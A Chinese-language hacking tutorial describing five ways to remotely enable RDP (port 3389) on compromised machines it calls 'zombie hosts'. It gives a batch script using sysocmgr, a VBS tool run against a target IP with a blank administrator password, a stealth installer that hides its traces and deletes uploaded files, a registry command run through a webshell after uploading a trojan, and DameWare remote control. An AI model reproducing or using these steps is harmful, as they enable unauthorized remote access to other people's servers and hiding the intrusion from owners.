3389端口是遠程登入使用的默認端口,在滲透測試和系統安全配置中起到舉足輕重的地位。因此,這里根據資料和個人見解整理了幾種遠程打開3389端口的方法,僅做參考!
以下共五種方法,其中一、四針對服務,二、三、五使用應用軟件,希望對你有幫助。
一、打開記事本,編輯內容如下:
echo[Components]>c:\sql
echoTSEnable=on>>c:\sql
sysocmgr/i:c:\winnt\inf\sysoc.inf/u:c:\sql/q
編輯好后存為BAT 文件,上傳至肉雞,執行。這里值得注意的是要確定winnt 是否在c 盤,如果在其他盤則需要改動。
二、(對xp\2000都有效) 腳本文件本地開3389工具:rots1.05
使用方法:
在命令行方式下使用windows 自帶的腳本宿主程序cscript.exe 調用腳本,例如:
c:\>cscriptROTS.vbs<目標IP><用戶名><密碼>[服務端口][自動重起選項]
服務端口:設置終端服務的服務端口。默認是3389。
自動重起選項:使用/r表示安裝完成后自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,端口設置不能忽略。
比如掃描到了一個有NT 弱口令的服務器,IP 地址是222.222.222.222,管理員帳戶是administrator ,密碼為空
運行CMD (2000下的DOS ),我們給它開終端!
命令如下!
cscriptreg.vbe222.222.222.222administrator""3389/fr
上面的命令應該可以理解吧?cscriptreg.vbe 這是命令,后面的是IP ,然后是管理員帳戶,接這是密碼,因為222.222.222.222這台服務器的管理員密碼是空的,那就用雙引號表示為空,再后面是端口,你可以任意設置終端的端口,/fr是重啟命令(強制重啟,一般我都用這個,你也可以/r,這是普通重啟)
腳本會判斷目標系統類型,如果不是server 及以上版本,就會提示你是否要取消。
因為pro 版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。
如果要對本地使用,IP 地址為127.0.0.1或者一個點(用. 表示),用戶名和密碼都為空(用"" 表示)。
腳本訪問的目標的135端口,如果目標135端口未開放,或者WMI 服務關閉,那么腳本就沒用了。
三、下載3389自動安裝程序-djshao 正式版5.0
說明:
解壓djshao5.0.zip, 用你的隨便什么方法把把解壓出來的djxyxs.exe 上傳到肉雞的c:\winnt\temp下,然后進入c:\winnt\temp目錄執行djxyxs.exe 解壓縮文件,然后再執行解壓縮出來的azzd.exe 文件,等一會肉雞會自動重啟!重啟后會出現終端服務!
特點:
1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完后會自動恢復到原來的安裝路徑,
2、在后台安靜模式運行,就算肉雞旁有人也沒有關系!
3、在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鈎。
4、不會在肉雞上留下你的上傳文件,在安裝完終端服務后會會自動刪除你上傳到c:\winnt\temp下的任何文件!
5、不管肉雞的winnt 裝在什么盤上都無所謂!
6、安裝完終端后會刪除在管理工具中的終端快捷圖標!
7、在沒有安裝終端前,終端服務是被禁止的!安裝終端后,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝后就可能還是手動!等重啟后就不會打開服務!所以在軟件中加了sc 指令,等安裝完后,不管終端服務是禁止還是手動還是自動,全部改為自動。
8、自動檢測肉雞是不是服務器版,如果不是刪除原文件,不執行安裝,如果是服務器版就執行安裝!
9、支持中日韓繁四個版本的win2000服務器版!
四、getshell后使用虛擬界面
上傳木馬文件,getshell后菜刀連接,使用虛擬化界面輸入命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
該命令需要一定的權限,大部分時候開發者並不會禁用這部分權限,因此使用很方便
五、下載DameWareNTUtilities3.66.0.0注冊版
安裝注冊完畢后輸入對方IP 用戶名密碼,等待出現是否安裝的對話框點是。 復制啟動后出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入后點添加/刪除windows 組件,找到終端服務,點際進入后在啟動終端服務上打上勾。確定自動提示重起,重起后OK。